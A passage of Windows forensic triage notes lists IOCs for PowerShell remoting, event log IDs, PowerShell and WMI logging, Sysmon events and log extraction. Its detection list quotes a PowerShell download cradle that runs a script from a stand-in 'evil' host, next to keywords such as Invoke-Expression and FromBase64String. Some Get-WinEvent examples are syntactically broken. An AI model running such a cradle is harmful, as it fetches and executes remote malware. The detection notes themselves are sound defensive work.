  • Microsoft\PowerShell\1\ShellIds\Microsoft.
    PowerShell\ExecutionPolicy
Attacker may change
execution policy to a less
restrictive setting, such as
"bypass"


Target File System

Type IOC Remarks

Prefetch:

C:\Windows\Prefetch\ 

  • evil.exe-{hash].pf
  • wsmprovhost.exe-{hash].pf

first/last execution

File Creation 
  • evil.exe
  • With Enter-PSSession, a user
    profile directory may be created


Evidence of Malware Execution


Event Logs


Correlate event- and AV-log for filtering noise

Identify potential malware and determine wether it was executed

Source ID Action
system.evtx 1001
  • WER (windows Error Report) entries
application.evtx 1000
1001
1002
  • Application Errors and Hangs (indication of attempted Buffer-Overflow)

Identify potential execution and record full command line used to launch a process (win7+)

Source ID Action
security.evtx 4688
  • new process created
security.evtx 4689
  • Process exit
security.evtx 4624 Type 3 immadiately bevore 4688

Enable: gpedit → Comp. config → Policies → Admin. templates → System → Audit Process Creation
http://for508.com/uhat4


Identify PowerShell activity including pipeline output and full script content (Win10, PS5)

Source ID Action

PS command history

%userprofile%\AppData\Roaming\Microsoft\Windows\
PowerShell\PSReadline\ConsoleHost_history.txt


By default, in Windows 10, the last 4096 typed commands. The history is stored separately for PowerShell and ISE.

Microsoft-Windows-PowerShell/Operational 4103
  • Module logging
Microsoft-Windows-PowerShell/Operational 4104
  • Script block logging
Microsoft-Windows-PowerShell/Operational 4105 Start Script: Ignore as very noisy
Microsoft-Windows-PowerShell/Operational 4106 Start Script: Ignore as very noisy
Powershell.evtx 400 Not very usefull, but never know...
Powershell.evtx 800 Not very usefull, but never know...

Enable: gpedit → Comp. config → Policies → Admin. templates → Windows Components→ PowerShell

Why to look for "older" PowerShell executions:

This capability was introduced in the PowerShell v5, in Windows 10. It is based on the third party module PSReadLine, which is not included in the separately installed PowerShell 5 for previous versions of Windows.

same reason for the "downgrade" "powershell -Version 2 -Command <...>"

Look for suspicous strings:

  • IEX (New-Object Net.Webclient) .downloadstring("http://evil.ps1")
  • download
  • Start-Process
  • FromBase64String
  • rundll32
  • IEX
  • Invoke-Expression
  • WebClient
  • powershell -version
  • http
  • bitstransfer

Check for obfuscations (use entropy/frequency detection

Enable transcript logs, although it only logs to the user folder.
gpedit → Comp. config → Policies → Admin. templates → Windows Components→ PowerShell



Auditing WMI persitence

Source ID Action
security.evtx 5857-5861
  • Consumer activity
security.evtx 5861
  • New permanent event consumer created
WMI-Activity/Operational
Default enabled W10/2012R2+

Look for suspicous strings:

  • CommandLine
  • ActiveScript
  • scrons
  • wbemcons
  • powershell
  • eval
  • .vbs
  • .ps1
  • ActiveXObject

Extracting Event Logs

Live system


Vista+ and 2008+ use Sysinternals PsTools, it can be used from your forensic workstation and connect to the suspicious machine via network to avoid imense tainting you evidences.

Get-WinEvent -FilterHashtable @{logname="Security";id=4624} | Where {$_.Message match "what ever";}
Get-WinEvent -FilterHashtable @{ComputerName="Security";id=4624} | Where {$_.Message match "what ever";}


Use the PS included in SANS SEC505 course. Look for Day6

SYSMON

Deploy sysmon (with -n -l -i) where ever possible.

Logs to: Applications and Services Logs/Microsoft/Windows/Sysmon/Operational

psexec \\remote-pc -u “DOMAIN\Administrator” -p “password” cmd /c “msiexec.exe /i “\\server\share\application.msi” /quiet /norestart”

  • Event ID 1: Process creation
  • Event ID 2: A process changed a file creation time
  • Event ID 3: Network connection
  • Event ID 4: Sysmon service state changed
  • Event ID 5: Process terminated
  • Event ID 6: Driver loaded
  • Event ID 7: Image loaded
  • Event ID 8: CreateRemoteThread
  • Event ID 9: RawAccessRead
  • Event ID 10: ProcessAccess
  • Event ID 11: FileCreate
  • Event ID 12: RegistryEvent (Object create and delete)

Offline system

Use a commercial forensic tool (FTK, Encase) or Autopsy to carve.
TZWorks maintains a tool EVTXtract

Get-WinEvent -FilterHashtable @{Path="C:\where you put the*.evtx"id=4624} | Where {$_.Message match "what ever";}